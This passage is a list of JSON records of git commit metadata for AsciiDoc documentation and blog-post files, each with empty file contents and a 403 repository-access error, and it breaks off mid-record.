{"commit":"0513d988b9e8555f8dff22540f814c4647970378","subject":"Update 2016-03-11-public-suck-ios.adoc","message":"Update 2016-03-11-public-suck-ios.adoc","repos":"hbbalfred\/hbbalfred.github.io,hbbalfred\/hbbalfred.github.io,hbbalfred\/hbbalfred.github.io","old_file":"_posts\/2016-03-11-public-suck-ios.adoc","new_file":"_posts\/2016-03-11-public-suck-ios.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hbbalfred\/hbbalfred.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff0bbbcbdc0277411afcfc05416428a22ac488fc","subject":"[doc] contributing: fixed unordered list formatting","message":"[doc] contributing: fixed unordered list formatting\n\nChange-Id: I0d96e28767331ae81ff90f42dd5e68a5b3b83ab8\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/5066\nReviewed-by: Will Berkeley <c74686ab413a71926fc1bc9d16ebfa30e619336a@gmail.com>\nTested-by: Kudu Jenkins\n","repos":"helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu","old_file":"docs\/contributing.adoc","new_file":"docs\/contributing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"09ec62ca6801819c9a18841ab7e8a78294cf835c","subject":"[docs] Remove some obsolete limitations related to disks","message":"[docs] Remove some obsolete limitations related to disks\n\nThis removes three known limitations that are not 
limitations anymore.\nThe new and improved state of things is documented in administration.adoc\nand the docs for the command line tools.\n\nChange-Id: If42f656eae596ccad3c196183705bd0599f348ec\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/10220\nTested-by: Will Berkeley <c74686ab413a71926fc1bc9d16ebfa30e619336a@gmail.com>\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\n","repos":"InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu","old_file":"docs\/known_issues.adoc","new_file":"docs\/known_issues.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8b6052629b7e86dfc625897cd54c8054c8ea7d00","subject":"y2b create post Instagram for Android Hands-on (Download Link Included)","message":"y2b create post Instagram for Android Hands-on (Download Link Included)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-04-03-Instagram-for-Android-Handson-Download-Link-Included.adoc","new_file":"_posts\/2012-04-03-Instagram-for-Android-Handson-Download-Link-Included.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a059276d86682b7a40567ca6fd3ab0b6f5bb0f78","subject":"Update 2016-07-03-Rights-and-Duties.adoc","message":"Update 2016-07-03-Rights-and-Duties.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2016-07-03-Rights-and-Duties.adoc","new_file":"_posts\/2016-07-03-Rights-and-Duties.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5dc1391df3c29c6ac0507cf01e4166dadca6fdd0","subject":"Added Forge 2.16.1.Final release announcement","message":"Added Forge 2.16.1.Final release announcement\n","repos":"luiz158\/docs,forge\/docs,addonis1990\/docs,agoncal\/docs,luiz158\/docs,agoncal\/docs,forge\/docs,addonis1990\/docs","old_file":"news\/2015-05-19-forge-2.16.1.final.asciidoc","new_file":"news\/2015-05-19-forge-2.16.1.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/addonis1990\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"e776da17d5ac35f76688c39c217e8b0dbd01a7a5","subject":"y2b create post The Mind Blowing 33 Million Pixel Display...","message":"y2b create post 
The Mind Blowing 33 Million Pixel Display...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-26-The%20Mind%20Blowing%2033%20Million%20Pixel%20Display....adoc","new_file":"_posts\/2018-01-26-The%20Mind%20Blowing%2033%20Million%20Pixel%20Display....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dab502004a180bd636baac82e3110762cfd81e81","subject":"Publish 2097-1-1-Puzzle-4-No-Hacking.adoc","message":"Publish 2097-1-1-Puzzle-4-No-Hacking.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"2097-1-1-Puzzle-4-No-Hacking.adoc","new_file":"2097-1-1-Puzzle-4-No-Hacking.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aad3e2e7c620960a4d0e5da11dfca9021f81ae1d","subject":"write(promise-catch): IE8\u4ee5\u4e0b\u306e\u554f\u984c\u306b\u3064\u3044\u3066\u3092\u8ffd\u52a0","message":"write(promise-catch): IE8\u4ee5\u4e0b\u306e\u554f\u984c\u306b\u3064\u3044\u3066\u3092\u8ffd\u52a0\n","repos":"wenber\/promises-book,azu\/promises-book,tangjinzhou\/promises-book,oToUC\/promises-book,cqricky\/promises-book,cqricky\/promises-book,mzbac\/promises-book,genie88\/promises-book,mzbac\/promises-book,azu\/promises-book,lidasong2014\/promises-book,liubin\/promises-book,oToUC\/promises-book,liubin\/promises-book,azu\/promises-book,liubin\/promises-book,genie88\/promises-book,wangwei1237\/promises-book,purepennons\/promises-book,dieface\/promises-book,lidasong2014\/promises-book,liyunsheng\/promises-book,wangwei1237\/promises-book,dieface\/promises-book,tangjinzhou\/promises-book,genie88\/promises-book,sunfurong\/promise,purepennons\/promises-book,lidasong2014\/promises-book,mzbac\/promises-book,liyunsheng\/promises-book,sunfurong\/promise,purepennons\/promises-book,charlenopires\/promises-book,wenber\/promises-book,xifeiwu\/promises-book,dieface\/promises-book,sunfurong\/promise,tangjinzhou\/promises-book,xifeiwu\/promises-book,wangwei1237\/promises-book,oToUC\/promises-book,wenber\/promises-book,xifeiwu\/promises-book,liyunsheng\/promises-book,charlenopires\/promises-book,azu\/promises-book,cqricky\/promises-book,charlenopires\/promises-book","old_file":"Ch2_HowToWrite\/promise-catch.adoc","new_file":"Ch2_HowToWrite\/promise-catch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xifeiwu\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2546814157f6cfacce08f8100d89665068801b4f","subject":"Update 2015-10-02-First-Post.adoc","message":"Update 2015-10-02-First-Post.adoc","repos":"wink-\/wink-.github.io,wink-\/wink-.github.io,wink-\/wink-.github.io","old_file":"_posts\/2015-10-02-First-Post.adoc","new_file":"_posts\/2015-10-02-First-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wink-\/wink-.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80219bf53fc6af6c6b43d6ca105f8f2e8c2bce6a","subject":"Update 2016-06-28-First-post.adoc","message":"Update 2016-06-28-First-post.adoc","repos":"darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io","old_file":"_posts\/2016-06-28-First-post.adoc","new_file":"_posts\/2016-06-28-First-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/darsto\/darsto.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c1f7390f8a2b0dcde2b7fe751ce866cd7b3caa3","subject":"Update 2016-02-20-Comecando-com-Cordova.adoc","message":"Update 2016-02-20-Comecando-com-Cordova.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2016-02-20-Comecando-com-Cordova.adoc","new_file":"_posts\/2016-02-20-Comecando-com-Cordova.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a9fbe944417f3512b34ccbddbe001bf61b7342b8","subject":"Add draft of the JS module processing improvements blog post","message":"Add draft of the JS module processing improvements blog post\n","repos":"clojure\/clojurescript-site","old_file":"content\/news\/2017-07-12-clojurescript-is-not-an-island-integrating-node-modules.adoc","new_file":"content\/news\/2017-07-12-clojurescript-is-not-an-island-integrating-node-modules.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"f88131a393aeca30243601df523ca59d337ee11b","subject":"Update 2016-05-26-Such-as-the-story-of-when-he-turned-into-https-of-Wordpress-site.adoc","message":"Update 2016-05-26-Such-as-the-story-of-when-he-turned-into-https-of-Wordpress-site.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-26-Such-as-the-story-of-when-he-turned-into-https-of-Wordpress-site.adoc","new_file":"_posts\/2016-05-26-Such-as-the-story-of-when-he-turned-into-https-of-Wordpress-site.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"68856c5be4ad8bb2ae13ed115e3b2770a9966c7b","subject":"Update 2017-01-13-memo-like-asciidoc.adoc","message":"Update 2017-01-13-memo-like-asciidoc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"e92234418b54c124c17bcb77a4dae00402766a48","subject":"Update 2017-01-13-memo-like-asciidoc.adoc","message":"Update 2017-01-13-memo-like-asciidoc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"87ff3568e0d4bdd0f65577c6bc92e92b4921203e","subject":"added plantuml exampler","message":"added plantuml exampler\n","repos":"tsypuk\/springrestdoc","old_file":"asciidocisawsome\/src\/docs\/asciidoc\/index.adoc","new_file":"asciidocisawsome\/src\/docs\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tsypuk\/springrestdoc.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"670fec851152c86a16c6e6b2fc583ac183f6c332","subject":"Add parsers doc","message":"Add parsers doc\n","repos":"wilkerlucio\/pathom,wilkerlucio\/pathom,wilkerlucio\/pathom,wilkerlucio\/pathom","old_file":"docs-src\/modules\/ROOT\/pages\/core\/parsers.adoc","new_file":"docs-src\/modules\/ROOT\/pages\/core\/parsers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wilkerlucio\/pathom.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dae762913d66e4387395cbd7f3ae5e25d39c4b77","subject":"[DOCS] Added xpack.monitoring.ui.enabled to monitoring settings.","message":"[DOCS] Added xpack.monitoring.ui.enabled to monitoring settings.\n\nOriginal commit: 
elastic\/x-pack-elasticsearch@3dd136ed57e08e4a2bea311f2be9f14ec54cc368\n","repos":"scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,strapdata\/elassandra,HonzaKral\/elasticsearch,vroyer\/elassandra,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,strapdata\/elassandra,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,strapdata\/elassandra,gfyoung\/elasticsearch,vroyer\/elassandra,gingerwizard\/elasticsearch,uschindler\/elasticsearch,strapdata\/elassandra,robin13\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,strapdata\/elassandra,GlenRSmith\/elasticsearch,vroyer\/elassandra,coding0011\/elasticsearch,gingerwizard\/elasticsearch","old_file":"docs\/en\/settings\/monitoring-settings.asciidoc","new_file":"docs\/en\/settings\/monitoring-settings.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"112ad56ac1590cb11603fbdc0caf76de54348abf","subject":"Update 2018-08-10-P-W-A-for-mahjong.adoc","message":"Update 2018-08-10-P-W-A-for-mahjong.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed37c14b89ed1fb9e03c973395fac509ecb8062d","subject":"Update 2019-02-27-Rancher-E-K-S-R-C.adoc","message":"Update 2019-02-27-Rancher-E-K-S-R-C.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-27-Rancher-E-K-S-R-C.adoc","new_file":"_posts\/2019-02-27-Rancher-E-K-S-R-C.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"88a3421c9529816f49128916f5da0ea7a0ca5926","subject":"Update 2017-10-28-thirty-five-minutes.adoc","message":"Update 
2017-10-28-thirty-five-minutes.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-10-28-thirty-five-minutes.adoc","new_file":"_posts\/2017-10-28-thirty-five-minutes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8535211f9d3f9871ca4706ce7fa98268b5c4912f","subject":"Update 2017-05-19-Network-Construction.adoc","message":"Update 2017-05-19-Network-Construction.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-19-Network-Construction.adoc","new_file":"_posts\/2017-05-19-Network-Construction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4b4fb504c05424bb8707026dcf604bc5e8784884","subject":"Update 2018-02-23-make-book-manage-App.adoc","message":"Update 2018-02-23-make-book-manage-App.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b945fd9afd8e4fb347b9bf45d72ed635d6080c23","subject":"Update 2019-02-04-Google-Spread-Sheet.adoc","message":"Update 2019-02-04-Google-Spread-Sheet.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-04-Google-Spread-Sheet.adoc","new_file":"_posts\/2019-02-04-Google-Spread-Sheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d8f32a1c5c66032c4ffd0690e5b2b92c316c7823","subject":"Update 2016-11-14-231000-Monday.adoc","message":"Update 2016-11-14-231000-Monday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-14-231000-Monday.adoc","new_file":"_posts\/2016-11-14-231000-Monday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76dc04398b9c736f8be4145823dc7d352f13f1f9","subject":"Add 2017-06-09-forge-3.7.0.final.asciidoc","message":"Add 
2017-06-09-forge-3.7.0.final.asciidoc\n","repos":"forge\/docs,forge\/docs","old_file":"news\/2017-06-09-forge-3.7.0.final.asciidoc","new_file":"news\/2017-06-09-forge-3.7.0.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"0af3643c7454762d69639ea8ca8890469df008a8","subject":"Update 2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","message":"Update 2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","new_file":"_posts\/2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5085c6541dec792ce9bcd45613fc60d1003ca336","subject":"y2b create post Never Plug Your iPhone In Again...","message":"y2b create post Never Plug Your iPhone In Again...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-06-06-Never-Plug-Your-iPhone-In-Again.adoc","new_file":"_posts\/2017-06-06-Never-Plug-Your-iPhone-In-Again.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6511328b166e220b52f964d5efdf7c332506720e","subject":"y2b create post I Can't Believe These Are Only $20 Bucks","message":"y2b create post I Can't Believe These Are Only $20 Bucks","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-04-19-I-Cant-Believe-These-Are-Only-20-Bucks.adoc","new_file":"_posts\/2017-04-19-I-Cant-Believe-These-Are-Only-20-Bucks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"89577a59385ef96b61e1e5cc873329311ca490f5","subject":"curationdomain documentation","message":"curationdomain documentation\n","repos":"EBIBioSamples\/biosamples-v4,EBIBioSamples\/biosamples-v4,EBIBioSamples\/biosamples-v4,EBIBioSamples\/biosamples-v4","old_file":"webapps\/core\/src\/main\/asciidoc\/cookbook_recipes\/curation_domains.adoc","new_file":"webapps\/core\/src\/main\/asciidoc\/cookbook_recipes\/curation_domains.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/EBIBioSamples\/biosamples-v4.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4a697412b924489bb0e2012e414a245766a5e1f2","subject":"y2b create post Deal Therapy: Rubber Band Shotgun, MacBook Pro, 84\\","message":"y2b create post Deal Therapy: Rubber Band Shotgun, MacBook Pro, 
84\\","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-03-22-Deal-Therapy-Rubber-Band-Shotgun-MacBook-Pro-84.adoc","new_file":"_posts\/2013-03-22-Deal-Therapy-Rubber-Band-Shotgun-MacBook-Pro-84.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"11c0f93b0786d6a7d193cc9b733d6059a579016e","subject":"added cbauth README","message":"added cbauth README\n\nChange-Id: I4f69bd5646ad879808dc2440f50bcd00622962a6\nReviewed-on: http:\/\/review.couchbase.org\/45897\nReviewed-by: Aliaksey Artamonau <3c875bcfb3adf2a65b2ae7686ca921e6c9433147@gmail.com>\nTested-by: Aliaksey Artamonau <3c875bcfb3adf2a65b2ae7686ca921e6c9433147@gmail.com>\n","repos":"couchbase\/cbauth,couchbase\/cbauth","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/couchbase\/cbauth.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"40a1a7b8b6312f8727386eb78a59ac6e4315c9dc","subject":"Update 2016-02-20-Chocolatey-A-must-have-on-your-Windows-machine.adoc","message":"Update 2016-02-20-Chocolatey-A-must-have-on-your-Windows-machine.adoc","repos":"alexandrev\/alexandrev.github.io,alexandrev\/alexandrev.github.io,alexandrev\/alexandrev.github.io","old_file":"_posts\/2016-02-20-Chocolatey-A-must-have-on-your-Windows-machine.adoc","new_file":"_posts\/2016-02-20-Chocolatey-A-must-have-on-your-Windows-machine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alexandrev\/alexandrev.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"df8fec04fb9dcc0d04bd7380b69c2d060837371b","subject":"Update 2019-07-04-Checking-Stripe-Webhook-Signatures-from-NestJS.adoc","message":"Update 2019-07-04-Checking-Stripe-Webhook-Signatures-from-NestJS.adoc","repos":"YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io","old_file":"_posts\/2019-07-04-Checking-Stripe-Webhook-Signatures-from-NestJS.adoc","new_file":"_posts\/2019-07-04-Checking-Stripe-Webhook-Signatures-from-NestJS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannDanthu\/YannDanthu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c896d7e198612a2efcb198611a7c8151ea589224","subject":"Update 2017-06-12-1336-Test.adoc","message":"Update 2017-06-12-1336-Test.adoc","repos":"IdoramNaed\/idoramnaed.github.io,IdoramNaed\/idoramnaed.github.io,IdoramNaed\/idoramnaed.github.io,IdoramNaed\/idoramnaed.github.io","old_file":"_posts\/2017-06-12-1336-Test.adoc","new_file":"_posts\/2017-06-12-1336-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/IdoramNaed\/idoramnaed.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d457e87a0003c55b5226368dac67549541381dfa","subject":"Publish 2016-7-2-easywechat.adoc","message":"Publish 
2016-7-2-easywechat.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-7-2-easywechat.adoc","new_file":"2016-7-2-easywechat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"93fc929998201995f1070d6e5ade8de11b2bc82e","subject":"module-authscan.adoc: Document authscan.cpp module, RNS-1203.","message":"module-authscan.adoc: Document authscan.cpp module, 